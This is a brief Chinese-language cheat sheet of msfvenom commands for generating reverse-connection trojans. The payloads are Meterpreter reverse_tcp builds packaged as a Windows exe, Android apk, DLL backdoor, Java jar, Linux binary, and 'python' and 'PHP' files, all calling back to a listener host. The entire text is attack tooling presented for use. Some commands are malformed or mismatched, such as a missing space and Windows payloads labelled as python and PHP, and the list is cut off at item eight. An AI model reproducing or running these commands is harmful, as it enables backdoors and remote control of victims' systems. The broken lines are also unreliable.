生成反弹木马:
1. msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 -f exe > abc.exe //exe文件
2. msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=5555 R > apk.apk //安卓
3. msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 -a x86 -f dll > shell.dll // DLL后门
4. msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 W > text.jar //Java后门
5. msfvenom -plinux/x86/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 R >> /root/Desktop/test //linux 后门 需要把test加权限 chmod +x ./test
6.msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444-f raw > shell.py //python
7. msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 -f raw > shell.php //PHP
8. msfvenom